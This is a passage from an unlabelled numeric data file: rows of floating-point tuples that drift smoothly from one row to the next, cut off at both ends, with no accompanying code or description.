5.832369272976682, 5.872214545077291, 4.8833991769547325, 6.256958847736625, 2.7875225562817723, 2.162630090377459, 1.2302958631145768, 0.0, 16.198217592592595, 13.533254494260342, 10.813150451887294, 8.362567668845315, 12.51391769547325, 6.8367588477366255, 5.872214545077291, 4.165978052126201, 5.999419026870006, 4.792113405797102, 2.66213024691358, 1.2932327359617684, 0.0), (16.59181726009423, 14.174735607770254, 13.295024577046181, 14.359304549114333, 11.996799268404205, 5.8306838388457045, 5.853328107649096, 4.861301630848957, 6.2500815424477985, 2.7791678097850943, 2.159506369740288, 1.228189701505708, 0.0, 16.195091735253776, 13.510086716562785, 10.797531848701441, 8.337503429355282, 12.500163084895597, 6.80582228318854, 5.853328107649096, 4.164774170604074, 5.998399634202102, 4.786434849704778, 2.6590049154092363, 1.2886123279791142, 0.0), (16.584111457028687, 14.122988247267578, 13.279000114311843, 14.341288204508857, 11.993779284004411, 5.828196087994717, 5.8341613276311906, 4.8392772443225125, 6.242891845755221, 2.7707841437370564, 2.1560499655423633, 1.226020391628362, 0.0, 16.190463820301783, 13.486224307911982, 10.780249827711817, 8.312352431211167, 12.485783691510441, 6.774988142051518, 5.8341613276311906, 4.162997205710512, 5.9968896420022055, 4.780429401502953, 2.6558000228623686, 1.2839080224788708, 0.0), (16.573982608695655, 14.070348387096773, 13.262583333333334, 14.322316304347826, 11.989803921568626, 5.824933333333335, 5.81472268907563, 4.817333333333334, 6.2354, 2.762371764705883, 2.1522724082934617, 1.2237894736842108, 0.0, 16.184375, 13.461684210526316, 10.761362041467306, 8.287115294117648, 12.4708, 6.744266666666667, 5.81472268907563, 4.160666666666668, 5.994901960784313, 4.7741054347826095, 2.6525166666666666, 1.2791225806451614, 0.0), (16.561504001908514, 14.016846400283198, 13.245779721079103, 14.302413969404189, 11.984899002124855, 5.820922887771173, 5.795020676034474, 4.795477213839354, 6.227616247523244, 2.753930879259798, 2.1481852285033574, 1.2214984878749227, 0.0, 16.1768664266118, 13.436483366624147, 10.740926142516786, 8.261792637779392, 12.455232495046488, 6.713668099375096, 5.795020676034474, 4.157802062693695, 5.992449501062428, 4.76747132313473, 2.649155944215821, 1.274258763662109, 0.0), (16.546748923480646, 13.962512659852205, 13.228594764517604, 14.281606320450884, 11.979090346701094, 5.816192064217854, 5.775063772559778, 4.773716201798507, 6.219550830666057, 2.7454616939670253, 2.143799956681829, 1.219148974402169, 0.0, 16.167979252400553, 13.410638718423858, 10.718999783409142, 8.236385081901075, 12.439101661332113, 6.683202682517909, 5.775063772559778, 4.154422903012753, 5.989545173350547, 4.760535440150296, 2.645718952903521, 1.269319332713837, 0.0), (16.52979066022544, 13.90737753882915, 13.211033950617283, 14.259918478260868, 11.972403776325345, 5.810768175582992, 5.754860462703601, 4.752057613168724, 6.211213991769547, 2.7369644153957884, 2.13912812333865, 1.2167424734676198, 0.0, 16.157754629629633, 13.384167208143815, 10.695640616693249, 8.210893246187364, 12.422427983539094, 6.652880658436215, 5.754860462703601, 4.150548696844995, 5.986201888162673, 4.7533061594202906, 2.6422067901234567, 1.2643070489844683, 0.0), (16.510702498956285, 13.851471410239393, 13.193102766346595, 14.237375563607085, 11.964865112025606, 5.804678534776205, 5.734419230517997, 4.730508763907942, 6.2026159731748205, 2.728439250114312, 2.134181258983598, 1.2142805252729445, 0.0, 16.146233710562413, 13.357085778002387, 10.67090629491799, 8.185317750342936, 12.405231946349641, 6.622712269471118, 5.734419230517997, 4.146198953411575, 5.982432556012803, 4.745791854535696, 2.638620553269319, 1.259224673658127, 0.0), (16.48955772648655, 13.794824647108282, 13.174806698673981, 14.21400269726248, 11.956500174829877, 5.797950454707109, 5.7137485600550235, 4.70907696997409, 6.193767017222985, 2.7198864046908207, 2.1289708941264505, 1.2117646700198144, 0.0, 16.13345764746228, 13.329411370217956, 10.64485447063225, 8.15965921407246, 12.38753403444597, 6.592707757963726, 5.7137485600550235, 4.141393181933649, 5.9782500874149385, 4.738000899087494, 2.6349613397347964, 1.254074967918935, 0.0), (16.46642962962963, 13.737467622461173, 13.156151234567902, 14.189825, 11.94733478576616, 5.790611248285322, 5.69285693536674, 4.687769547325104, 6.184677366255142, 2.711306085693537, 2.123508559276981, 1.2091964479098987, 0.0, 16.119467592592596, 13.301160927008882, 10.617542796384903, 8.13391825708061, 12.369354732510285, 6.562877366255145, 5.69285693536674, 4.136150891632373, 5.97366739288308, 4.729941666666668, 2.6312302469135807, 1.248860692951016, 0.0), (16.441391495198904, 13.679430709323423, 13.1371418609968, 14.164867592592593, 11.93739476586245, 5.782688228420464, 5.671752840505201, 4.666593811918916, 6.1753572626124065, 2.702698499690686, 2.117805784944966, 1.2065773991448674, 0.0, 16.104304698216733, 13.27235139059354, 10.58902892472483, 8.108095499072057, 12.350714525224813, 6.533231336686482, 5.671752840505201, 4.130491591728903, 5.968697382931225, 4.721622530864199, 2.6274283721993603, 1.243584609938493, 0.0), (16.414516610007755, 13.620744280720386, 13.117784064929126, 14.139155595813204, 11.92670593614675, 5.774208708022151, 5.650444759522465, 4.645557079713459, 6.165816948635879, 2.694063853250491, 2.111874101640184, 1.2039090639263914, 0.0, 16.08801011659808, 13.242999703190304, 10.559370508200919, 8.082191559751472, 12.331633897271757, 6.503779911598843, 5.650444759522465, 4.1244347914443935, 5.963352968073375, 4.713051865271069, 2.6235568129858255, 1.23824948006549, 0.0), (16.385878260869568, 13.56143870967742, 13.098083333333335, 14.112714130434785, 11.915294117647058, 5.765200000000001, 5.628941176470589, 4.624666666666667, 6.156066666666666, 2.685402352941177, 2.1057250398724086, 1.2011929824561405, 0.0, 16.070625, 13.213122807017545, 10.528625199362043, 8.05620705882353, 12.312133333333332, 6.474533333333334, 5.628941176470589, 4.118, 5.957647058823529, 4.704238043478263, 2.619616666666667, 1.2328580645161293, 0.0), (16.355549734597723, 13.501544369219879, 13.078045153177872, 14.085568317230274, 11.903185131391377, 5.75568941726363, 5.607250575401629, 4.603929888736474, 6.146116659045877, 2.676714205330967, 2.099370130151417, 1.198430694935785, 0.0, 16.052190500685874, 13.182737644293633, 10.496850650757084, 8.030142615992899, 12.292233318091753, 6.445501844231063, 5.607250575401629, 4.111206726616879, 5.951592565695688, 4.695189439076759, 2.6156090306355746, 1.2274131244745345, 0.0), (16.323604318005607, 13.441091632373114, 13.057675011431185, 14.057743276972625, 11.890404798407703, 5.745704272722655, 5.585381440367643, 4.5833540618808115, 6.135977168114616, 2.667999616988085, 2.0928209029869853, 1.195623741566995, 0.0, 16.03274777091907, 13.151861157236944, 10.464104514934926, 8.003998850964255, 12.271954336229232, 6.416695686633136, 5.585381440367643, 4.104074480516182, 5.945202399203851, 4.6859144256575425, 2.6115350022862374, 1.2219174211248287, 0.0), (16.290115297906603, 13.380110872162485, 13.036978395061729, 14.029264130434784, 11.876978939724037, 5.735271879286694, 5.563342255420687, 4.562946502057613, 6.125658436213991, 2.659258794480756, 2.0860888888888893, 1.1927736625514405, 0.0, 16.012337962962963, 13.120510288065844, 10.430444444444445, 7.977776383442267, 12.251316872427982, 6.388125102880658, 5.563342255420687, 4.096622770919067, 5.938489469862018, 4.676421376811596, 2.607395679012346, 1.2163737156511352, 0.0), (16.255155961114095, 13.318632461613346, 13.015960791037951, 14.000155998389694, 11.862933376368382, 5.724419549865368, 5.54114150461282, 4.542714525224815, 6.115170705685108, 2.650491944377203, 2.0791856183669055, 1.1898819980907918, 0.0, 15.991002229080934, 13.088701978998708, 10.395928091834525, 7.951475833131607, 12.230341411370215, 6.35980033531474, 5.54114150461282, 4.088871107046691, 5.931466688184191, 4.666718666129899, 2.6031921582075905, 1.210784769237577, 0.0), (16.21879959444146, 13.256686773751051, 12.994627686328306, 13.970444001610309, 11.84829392936873, 5.713174597368289, 5.518787671996097, 4.522665447340345, 6.104524218869075, 2.64169927324565, 2.0721226219308098, 1.1869502883867193, 0.0, 15.968781721536352, 13.05645317225391, 10.360613109654047, 7.9250978197369495, 12.20904843773815, 6.331731626276483, 5.518787671996097, 4.080838998120206, 5.924146964684365, 4.656814667203437, 2.5989255372656612, 1.2051533430682777, 0.0), (16.18111948470209, 13.194304181600955, 12.972984567901234, 13.940153260869565, 11.833086419753089, 5.7015643347050755, 5.496289241622575, 4.5028065843621405, 6.093729218106997, 2.6328809876543215, 2.0649114300903775, 1.1839800736408925, 0.0, 15.945717592592594, 13.023780810049816, 10.324557150451888, 7.898642962962963, 12.187458436213994, 6.303929218106997, 5.496289241622575, 4.072545953360768, 5.9165432098765445, 4.646717753623189, 2.594596913580247, 1.1994821983273598, 0.0), (16.142188918709373, 13.131515058188414, 12.951036922725194, 13.90930889694042, 11.817336668549451, 5.689616074785349, 5.473654697544313, 4.483145252248133, 6.082795945739979, 2.624037294171441, 2.0575635733553868, 1.1809728940549822, 0.0, 15.921850994513035, 12.990701834604803, 10.287817866776932, 7.8721118825143215, 12.165591891479957, 6.276403353147386, 5.473654697544313, 4.064011481989534, 5.908668334274726, 4.636436298980141, 2.5902073845450393, 1.193774096198947, 0.0), (16.102081183276677, 13.068349776538785, 12.928790237768634, 13.877936030595814, 11.80107049678582, 5.677357130518723, 5.4508925238133665, 4.463688766956257, 6.07173464410913, 2.6151683993652335, 2.050090582235612, 1.1779302898306583, 0.0, 15.897223079561043, 12.957233188137238, 10.250452911178058, 7.845505198095699, 12.14346928821826, 6.24916427373876, 5.4508925238133665, 4.055255093227659, 5.90053524839291, 4.625978676865272, 2.585758047553727, 1.1880317978671624, 0.0), (16.06086956521739, 13.004838709677419, 12.906250000000002, 13.846059782608698, 11.784313725490197, 5.664814814814815, 5.428011204481793, 4.444444444444445, 6.060555555555556, 2.606274509803922, 2.04250398724083, 1.1748538011695908, 0.0, 15.871875000000001, 12.923391812865496, 10.212519936204147, 7.818823529411765, 12.121111111111112, 6.222222222222222, 5.428011204481793, 4.046296296296297, 5.892156862745098, 4.615353260869567, 2.5812500000000003, 1.1822580645161291, 0.0), (16.0186273513449, 12.941012230629672, 12.883421696387746, 13.813705273752014, 11.767092175690575, 5.652016440583244, 5.405019223601649, 4.4254196006706294, 6.049268922420364, 2.597355832055731, 2.0348153188808165, 1.17174496827345, 0.0, 15.845847908093276, 12.889194651007948, 10.174076594404081, 7.792067496167191, 12.098537844840727, 6.195587440938882, 5.405019223601649, 4.037154600416603, 5.883546087845287, 4.604568424584006, 2.5766843392775494, 1.1764556573299705, 0.0), (15.975427828472597, 12.876900712420905, 12.86031081390032, 13.780897624798712, 11.749431668414964, 5.638989320733629, 5.381925065224994, 4.406621551592746, 6.037884987044658, 2.5884125726888843, 2.027036107665348, 1.1686053313439067, 0.0, 15.819182956104251, 12.85465864478297, 10.135180538326738, 7.765237718066651, 12.075769974089315, 6.169270172229845, 5.381925065224994, 4.027849514809735, 5.874715834207482, 4.593632541599572, 2.5720621627800644, 1.1706273374928098, 0.0), (15.931344283413848, 12.812534528076466, 12.836922839506174, 13.747661956521743, 11.731358024691357, 5.625760768175583, 5.358737213403881, 4.388057613168725, 6.026413991769548, 2.5794449382716054, 2.0191778841042, 1.1654364305826295, 0.0, 15.791921296296294, 12.819800736408922, 10.095889420521, 7.738334814814815, 12.052827983539096, 6.143280658436215, 5.358737213403881, 4.018400548696845, 5.865679012345678, 4.582553985507248, 2.567384567901235, 1.1647758661887697, 0.0), (15.886450002982048, 12.74794405062171, 12.813263260173755, 13.714023389694043, 11.712897065547754, 5.612358095818728, 5.335464152190369, 4.369735101356501, 6.014866178936138, 2.5704531353721194, 2.01125217870715, 1.16223980619129, 0.0, 15.764104080932785, 12.784637868104188, 10.056260893535747, 7.711359406116356, 12.029732357872277, 6.117629141899102, 5.335464152190369, 4.008827211299091, 5.856448532773877, 4.571341129898015, 2.5626526520347515, 1.1589040046019738, 0.0), (15.840818273990577, 12.683159653081995, 12.789337562871514, 13.680007045088567, 11.694074612012159, 5.598808616572678, 5.312114365636515, 4.351661332114007, 6.003251790885536, 2.561437370558649, 2.0032705219839726, 1.1590169983715575, 0.0, 15.735772462277092, 12.749186982087132, 10.016352609919863, 7.684312111675945, 12.006503581771073, 6.09232586495961, 5.312114365636515, 3.999149011837627, 5.847037306006079, 4.560002348362857, 2.5578675125743033, 1.1530145139165453, 0.0), (15.79452238325282, 12.61821170848268, 12.765151234567902, 13.645638043478261, 11.674916485112563, 5.585139643347051, 5.288696337794377, 4.333843621399177, 5.991581069958848, 2.55239785039942, 1.9952444444444448, 1.1557695473251033, 0.0, 15.706967592592594, 12.713465020576134, 9.976222222222225, 7.657193551198258, 11.983162139917695, 6.067381069958849, 5.288696337794377, 3.9893854595336076, 5.8374582425562815, 4.5485460144927545, 2.553030246913581, 1.1471101553166074, 0.0), (15.747635617582157, 12.553130589849111, 12.740709762231369, 13.61094150563607, 11.655448505876976, 5.571378489051465, 5.265218552716011, 4.316289285169945, 5.979864258497181, 2.5433347814626543, 1.9871854765983423, 1.152498993253596, 0.0, 15.677730624142663, 12.677488925789556, 9.93592738299171, 7.630004344387961, 11.959728516994362, 6.042804999237923, 5.265218552716011, 3.9795560636081895, 5.827724252938488, 4.536980501878691, 2.5481419524462736, 1.141193689986283, 0.0), (15.700231263791975, 12.487946670206647, 12.71601863283036, 13.575942552334945, 11.635696495333388, 5.557552466595541, 5.241689494453475, 4.299005639384241, 5.968111598841639, 2.5342483703165772, 1.9791051489554419, 1.1492068763587067, 0.0, 15.648102709190674, 12.64127563994577, 9.89552574477721, 7.60274511094973, 11.936223197683278, 6.018607895137937, 5.241689494453475, 3.969680333282529, 5.817848247666694, 4.525314184111649, 2.5432037265660723, 1.1352678791096953, 0.0), (15.652382608695653, 12.422690322580646, 12.691083333333335, 13.540666304347827, 11.615686274509805, 5.543688888888889, 5.218117647058825, 4.282000000000001, 5.956333333333333, 2.5251388235294123, 1.9710149920255189, 1.1458947368421055, 0.0, 15.618125000000001, 12.604842105263158, 9.855074960127594, 7.575416470588236, 11.912666666666667, 5.9948000000000015, 5.218117647058825, 3.9597777777777776, 5.807843137254903, 4.51355543478261, 2.5382166666666675, 1.129335483870968, 0.0), (15.60416293910658, 12.357391919996457, 12.665909350708734, 13.505137882447666, 11.595443664434223, 5.529815068841132, 5.194511494584116, 4.265279682975157, 5.944539704313367, 2.516006347669384, 1.9629265363183495, 1.1425641149054624, 0.0, 15.58783864883402, 12.568205263960085, 9.814632681591746, 7.54801904300815, 11.889079408626735, 5.97139155616522, 5.194511494584116, 3.9498679063150943, 5.797721832217111, 4.501712627482556, 2.533181870141747, 1.1233992654542237, 0.0), (15.555645541838135, 12.292081835479447, 12.640502171925013, 13.469382407407409, 11.574994486134646, 5.515958319361886, 5.17087952108141, 4.248852004267642, 5.932740954122847, 2.506851149304716, 1.9548513123437101, 1.1392165507504473, 0.0, 15.557284807956103, 12.531382058254918, 9.77425656171855, 7.520553447914146, 11.865481908245695, 5.948392805974699, 5.17087952108141, 3.9399702281156324, 5.787497243067323, 4.48979413580247, 2.528100434385003, 1.1174619850435863, 0.0), (15.506903703703706, 12.22679044205496, 12.614867283950618, 13.433425000000002, 11.554364560639069, 5.5021459533607695, 5.1472302106027605, 4.2327242798353915, 5.920947325102881, 2.497673435003632, 1.9468008506113774, 1.135853584578731, 0.0, 15.526504629629631, 12.49438943036604, 9.734004253056886, 7.493020305010894, 11.841894650205761, 5.925813991769548, 5.1472302106027605, 3.93010425240055, 5.7771822803195345, 4.477808333333335, 2.522973456790124, 1.1115264038231782, 0.0), (15.458010711516671, 12.161548112748353, 12.589010173754001, 13.397290780998391, 11.533579708975497, 5.488405283747397, 5.123572047200224, 4.2169038256363365, 5.909169059594573, 2.4884734113343563, 1.9387866816311266, 1.132476756591983, 0.0, 15.495539266117968, 12.457244322511812, 9.693933408155633, 7.4654202340030675, 11.818338119189146, 5.903665355890872, 5.123572047200224, 3.920289488390998, 5.766789854487748, 4.465763593666131, 2.5178020347508006, 1.1055952829771232, 0.0), (15.409039852090416, 12.096385220584981, 12.562936328303612, 13.361004871175524, 11.512665752171923, 5.474763623431389, 5.099913514925861, 4.201397957628411, 5.897416399939034, 2.479251284865113, 1.9308203359127338, 1.129087606991874, 0.0, 15.464429869684501, 12.419963676910612, 9.654101679563668, 7.437753854595337, 11.794832799878067, 5.881957140679775, 5.099913514925861, 3.9105454453081343, 5.756332876085962, 4.4536682903918425, 2.5125872656607227, 1.099671383689544, 0.0), (15.360064412238325, 12.031332138590201, 12.536651234567902, 13.324592391304346, 11.491648511256354, 5.461248285322361, 5.076263097831727, 4.186213991769549, 5.885699588477366, 2.470007262164126, 1.922913343965976, 1.125687675980074, 0.0, 15.433217592592593, 12.382564435780811, 9.61456671982988, 7.410021786492376, 11.771399176954732, 5.860699588477368, 5.076263097831727, 3.9008916323731144, 5.745824255628177, 4.44153079710145, 2.5073302469135803, 1.093757467144564, 0.0), (15.311157678773782, 11.96641923978937, 12.510160379515318, 13.28807846215781, 11.470553807256785, 5.44788658232993, 5.052629279969876, 4.1713592440176805, 5.8740288675506775, 2.4607415497996183, 1.9150772363006283, 1.1222785037582528, 0.0, 15.401943587105624, 12.345063541340778, 9.575386181503141, 7.382224649398854, 11.748057735101355, 5.839902941624753, 5.052629279969876, 3.8913475588070923, 5.735276903628392, 4.429359487385938, 2.5020320759030636, 1.0878562945263066, 0.0), (15.26239293851017, 11.901676897207842, 12.483469250114315, 13.251488204508856, 11.449407461201215, 5.434705827363715, 5.0290205453923695, 4.156841030330743, 5.862414479500076, 2.451454354339816, 1.9073235434264675, 1.1188616305280807, 0.0, 15.370649005486968, 12.307477935808887, 9.536617717132337, 7.354363063019447, 11.724828959000153, 5.819577442463041, 5.0290205453923695, 3.8819327338312255, 5.724703730600607, 4.417162734836286, 2.496693850022863, 1.081970627018895, 0.0), (15.21384347826087, 11.83713548387097, 12.456583333333336, 13.214846739130437, 11.428235294117645, 5.421733333333335, 5.0054453781512604, 4.142666666666667, 5.850866666666667, 2.442145882352942, 1.8996637958532698, 1.1154385964912283, 0.0, 15.339375000000002, 12.26982456140351, 9.498318979266347, 7.326437647058825, 11.701733333333333, 5.799733333333334, 5.0054453781512604, 3.8726666666666674, 5.714117647058822, 4.40494891304348, 2.4913166666666675, 1.076103225806452, 0.0), (15.16558258483927, 11.772825372804107, 12.429508116140834, 13.17817918679549, 11.40706312703408, 5.408996413148403, 4.98191226229861, 4.128843468983388, 5.839395671391555, 2.4328163404072196, 1.8921095240908108, 1.112010941849365, 0.0, 15.308162722908094, 12.232120360343014, 9.460547620454054, 7.298449021221657, 11.67879134278311, 5.780380856576743, 4.98191226229861, 3.8635688665345733, 5.70353156351704, 4.392726395598498, 2.485901623228167, 1.0702568520731008, 0.0), (15.117683545058746, 11.708776937032614, 12.402249085505263, 13.141510668276972, 11.385916780978512, 5.396522379718539, 4.9584296818864715, 4.1153787532388355, 5.828011736015851, 2.423465935070874, 1.8846722586488671, 1.108580206804162, 0.0, 15.277053326474624, 12.194382274845779, 9.423361293244335, 7.27039780521262, 11.656023472031702, 5.76153025453437, 4.9584296818864715, 3.8546588426560997, 5.692958390489256, 4.380503556092325, 2.4804498171010527, 1.0644342670029652, 0.0), (15.07021964573269, 11.64502054958184, 12.374811728395064, 13.104866304347826, 11.36482207697894, 5.384338545953361, 4.935006120966905, 4.102279835390947, 5.816725102880659, 2.4140948729121283, 1.8773635300372145, 1.1051479315572885, 0.0, 15.246087962962964, 12.156627247130173, 9.386817650186073, 7.242284618736384, 11.633450205761317, 5.743191769547326, 4.935006120966905, 3.845956104252401, 5.68241103848947, 4.368288768115943, 2.474962345679013, 1.0586382317801675, 0.0), (15.02326417367448, 11.581586583477144, 12.347201531778696, 13.068271215781, 11.34380483606337, 5.372472224762486, 4.911650063591967, 4.089554031397653, 5.805546014327083, 2.404703360499207, 1.8701948687656293, 1.101715656310415, 0.0, 15.215307784636488, 12.118872219414563, 9.350974343828147, 7.214110081497619, 11.611092028654166, 5.725375643956714, 4.911650063591967, 3.837480160544633, 5.671902418031685, 4.356090405260334, 2.469440306355739, 1.0528715075888313, 0.0), (14.976806757924871, 11.51861130755273, 12.319490437669426, 13.031800658990448, 11.322854058851952, 5.3609451179335466, 4.888420770925416, 4.077235045853738, 5.794513499337931, 2.3953218946450923, 1.8631797083074313, 1.098292391533924, 0.0, 15.184710241349155, 12.081216306873161, 9.315898541537155, 7.185965683935276, 11.589026998675863, 5.708129064195233, 4.888420770925416, 3.829246512809676, 5.661427029425976, 4.343933552996817, 2.4638980875338854, 1.0471464825047938, 0.0), (14.930369436640104, 11.456715869170786, 12.292060900028826, 12.995747305532802, 11.301752911537415, 5.349730967961242, 4.865614566728464, 4.065474173003413, 5.783796819046966, 2.3861260671651134, 1.8563318232301862, 1.094921622948397, 0.0, 15.154040662656056, 12.044137852432362, 9.28165911615093, 7.1583782014953385, 11.567593638093932, 5.691663842204779, 4.865614566728464, 3.821236405686601, 5.6508764557687075, 4.331915768510935, 2.4584121800057654, 1.0415196244700715, 0.0), (14.883815844806392, 11.395922558068468, 12.264929243609757, 12.960101406218136, 11.280434856414509, 5.338800611665514, 4.84324772015325, 4.054268436185806, 5.773399988623354, 2.3771301311952313, 1.8496412030472253, 1.091605011007847, 0.0, 15.123210610656603, 12.007655121086316, 9.248206015236125, 7.131390393585693, 11.546799977246708, 5.675975810660129, 4.84324772015325, 3.8134290083325095, 5.640217428207254, 4.320033802072713, 2.452985848721952, 1.0359929598244064, 0.0), (14.837087797180216, 11.336142812561162, 12.238042919978499, 12.924799380319683, 11.25886776147603, 5.328128285467958, 4.821283854022315, 4.043586875265996, 5.763296714254843, 2.3683173433798195, 1.8430949150057288, 1.0883364263316462, 0.0, 15.092171615609425, 11.971700689648106, 9.215474575028642, 7.104952030139457, 11.526593428509686, 5.661021625372395, 4.821283854022315, 3.8058059181913984, 5.629433880738015, 4.308266460106562, 2.4476085839957, 1.0305584375055605, 0.0), (14.790127108518035, 11.277288070964257, 12.211349380701316, 12.88977764711069, 11.237019494714783, 5.317688225790165, 4.799686591158202, 4.033398530109057, 5.753460702129175, 2.359670960363252, 1.8366800263528757, 1.085109739539167, 0.0, 15.06087520777316, 11.936207134930834, 9.183400131764378, 7.079012881089755, 11.50692140425835, 5.6467579421526795, 4.799686591158202, 3.7983487327072605, 5.6185097473573915, 4.296592549036898, 2.4422698761402635, 1.0252080064512963, 0.0), (14.742875593576338, 11.21926977159314, 12.18479607734449, 12.854972625864399, 11.214857924123566, 5.3074546690537305, 4.7784195543834524, 4.023672440580065, 5.743865658434098, 2.351174238789904, 1.8303836043358468, 1.0819188212497801, 0.0, 15.02927291740644, 11.901107033747579, 9.151918021679233, 7.053522716369711, 11.487731316868196, 5.633141416812091, 4.7784195543834524, 3.791039049324093, 5.607428962061783, 4.284990875288134, 2.436959215468898, 1.0199336155993766, 0.0), (14.695275067111588, 11.161999352763203, 12.158330461474298, 12.820320735854047, 11.192350917695169, 5.297401851680244, 4.757446366520605, 4.014377646544097, 5.734485289357356, 2.3428104353041492, 1.824192716201821, 1.0787575420828581, 0.0, 14.997316274767892, 11.866332962911438, 9.120963581009105, 7.028431305912447, 11.468970578714712, 5.620128705161736, 4.757446366520605, 3.7838584654858884, 5.5961754588475845, 4.273440245284683, 2.43166609229486, 1.014727213887564, 0.0), (14.647267343880259, 11.105388252789831, 12.131899984657018, 12.785758396352872, 11.169466343422396, 5.287504010091301, 4.736730650392203, 4.005483187866229, 5.7252933010866975, 2.3345628065503625, 1.818094429197978, 1.0756197726577732, 0.0, 14.964956810116156, 11.831817499235502, 9.090472145989889, 7.003688419651086, 11.450586602173395, 5.60767646301272, 4.736730650392203, 3.7767885786366437, 5.584733171711198, 4.2619194654509585, 2.4263799969314035, 1.0095807502536214, 0.0), (14.59879423863883, 11.049347909988416, 12.105452098458917, 12.751222026634121, 11.146172069298046, 5.277735380708496, 4.716236028820784, 3.9969581044115383, 5.716263399809866, 2.326414609172919, 1.812075810571498, 1.0724993835938965, 0.0, 14.932146053709857, 11.797493219532859, 9.060379052857488, 6.979243827518756, 11.432526799619732, 5.595741346176154, 4.716236028820784, 3.769810986220354, 5.573086034649023, 4.250407342211375, 2.4210904196917835, 1.0044861736353108, 0.0), (14.549797566143766, 10.993789762674343, 12.078934254446281, 12.716648045971027, 11.122435963314915, 5.268070199953418, 4.695926124628894, 3.9887714360450994, 5.707369291714607, 2.3183490998161913, 1.8061239275695606, 1.0693902455106004, 0.0, 14.898835535807633, 11.763292700616601, 9.030619637847803, 6.955047299448573, 11.414738583429214, 5.584280010463139, 4.695926124628894, 3.762907285681013, 5.561217981657458, 4.238882681990344, 2.4157868508892566, 0.9994354329703949, 0.0), (14.50021914115155, 10.938625249163001, 12.052293904185383, 12.681972873636834, 11.098225893465804, 5.258482704247664, 4.675764560639071, 3.9808922226319887, 5.698584682988669, 2.3103495351245553, 1.8002258474393456, 1.0662862290272563, 0.0, 14.864976786668116, 11.729148519299818, 9.001129237196727, 6.931048605373665, 11.397169365977337, 5.573249111684785, 4.675764560639071, 3.7560590744626166, 5.549112946732902, 4.227324291212279, 2.4104587808370765, 0.9944204771966367, 0.0), (14.450000778418648, 10.883765807769782, 12.025478499242494, 12.647132928904785, 11.073509727743506, 5.248947130012824, 4.655714959673856, 3.9732895040372846, 5.689883279819794, 2.302399171742385, 1.794368637428032, 1.063181204763237, 0.0, 14.830521336549939, 11.694993252395603, 8.971843187140161, 6.907197515227153, 11.379766559639588, 5.562605305652198, 4.655714959673856, 3.74924795000916, 5.536754863871753, 4.215710976301596, 2.405095699848499, 0.9894332552517985, 0.0), (14.399084292701534, 10.82912287681007, 11.9984354911839, 12.612064631048113, 11.048255334140823, 5.239437713670492, 4.635740944555791, 3.965932320126061, 5.68123878839573, 2.294481266314054, 1.7885393647828007, 1.0600690433379134, 0.0, 14.795420715711726, 11.660759476717045, 8.942696823914003, 6.883443798942161, 11.36247757679146, 5.552305248176485, 4.635740944555791, 3.7424555097646373, 5.524127667070411, 4.204021543682705, 2.39968709823678, 0.9844657160736429, 0.0), (14.347411498756685, 10.774607894599258, 11.971112331575865, 12.576704399340066, 11.022430580650552, 5.229928691642264, 4.615806138107416, 3.958789710763395, 5.6726249149042225, 2.2865790754839375, 1.7827250967508306, 1.0569436153706582, 0.0, 14.759626454412127, 11.626379769077237, 8.913625483754151, 6.859737226451811, 11.345249829808445, 5.542305595068753, 4.615806138107416, 3.735663351173045, 5.511215290325276, 4.192234799780023, 2.394222466315173, 0.9795098085999328, 0.0), (14.294924211340579, 10.720132299452729, 11.943456471984673, 12.54098865305388, 10.996003335265492, 5.220394300349728, 4.595874163151275, 3.951830715814364, 5.664015365533016, 2.27867585589641, 1.7769129005793014, 1.0537987914808424, 0.0, 14.723090082909758, 11.591786706289264, 8.884564502896506, 6.836027567689229, 11.328030731066033, 5.53256300214011, 4.595874163151275, 3.728853071678377, 5.498001667632746, 4.1803295510179606, 2.388691294396935, 0.97455748176843, 0.0), (14.241564245209673, 10.665607529685879, 11.915415363976601, 12.504853811462798, 10.968941465978443, 5.210808776214481, 4.575908642509906, 3.9450243751440417, 5.655383846469858, 2.2707548641958457, 1.7710898435153934, 1.0506284422878387, 0.0, 14.68576313146326, 11.556912865166222, 8.855449217576966, 6.812264592587535, 11.310767692939717, 5.523034125201659, 4.575908642509906, 3.722006268724629, 5.484470732989221, 4.168284603820934, 2.3830830727953205, 0.9696006845168982, 0.0), (14.187273415120451, 10.610945023614088, 11.886936459117921, 12.468236293840059, 10.9412128407822, 5.201146355658116, 4.555873199005851, 3.938339728617507, 5.646704063902494, 2.2627993570266187, 1.765242992806286, 1.0474264384110183, 0.0, 14.647597130331262, 11.5216908225212, 8.82621496403143, 6.788398071079855, 11.293408127804987, 5.51367562006451, 4.555873199005851, 3.7151045397557967, 5.4706064203911, 4.156078764613354, 2.377387291823584, 0.9646313657830989, 0.0), (14.131993535829388, 10.556056219552751, 11.857967208974907, 12.431072519458905, 10.91278532766956, 5.191381275102222, 4.53573145546165, 3.9317458160998338, 5.637949724018666, 2.2547925910331035, 1.7593594156991588, 1.044186650469754, 0.0, 14.608543609772397, 11.48605315516729, 8.796797078495793, 6.764377773099309, 11.275899448037332, 5.504444142539767, 4.53573145546165, 3.7081294822158726, 5.45639266383478, 4.1436908398196355, 2.3715934417949813, 0.9596414745047956, 0.0), (14.07566642209295, 10.500852555817252, 11.828455065113841, 12.393298907592571, 10.883626794633326, 5.181487770968396, 4.515447034699847, 3.9252116774560997, 5.629094533006126, 2.2467178228596745, 1.7534261794411918, 1.0409029490834167, 0.0, 14.568554100045299, 11.449932439917582, 8.767130897205957, 6.740153468579022, 11.258189066012251, 5.49529634843854, 4.515447034699847, 3.701062693548854, 5.441813397316663, 4.131099635864191, 2.3656910130227686, 0.9546229596197504, 0.0), (14.018233888667616, 10.445245470722984, 11.798347479100995, 12.354851877514303, 10.853705109666297, 5.171440079678229, 4.49498355954298, 3.918706352551382, 5.620112197052615, 2.238558309150706, 1.7474303512795641, 1.0375692048713792, 0.0, 14.527580131408602, 11.413261253585167, 8.73715175639782, 6.715674927452117, 11.24022439410523, 5.486188893571935, 4.49498355954298, 3.693885771198735, 5.4268525548331485, 4.1182839591714355, 2.3596694958201994, 0.949567770065726, 0.0), (13.959637750309861, 10.38914640258533, 11.767591902502646, 12.315667848497343, 10.822988140761264, 5.161212437653315, 4.474304652813592, 3.9121988812507547, 5.61097642234588, 2.2302973065505736, 1.7413589984614566, 1.0341792884530125, 0.0, 14.485573234120938, 11.375972172983136, 8.706794992307282, 6.690891919651719, 11.22195284469176, 5.477078433751057, 4.474304652813592, 3.686580312609511, 5.411494070380632, 4.105222616165782, 2.3535183805005295, 0.9444678547804848, 0.0), (13.899819821776152, 10.332466789719687, 11.736135786885072, 12.275683239814924, 10.791443755911033, 5.150779081315248, 4.453373937334223, 3.9056583034192958, 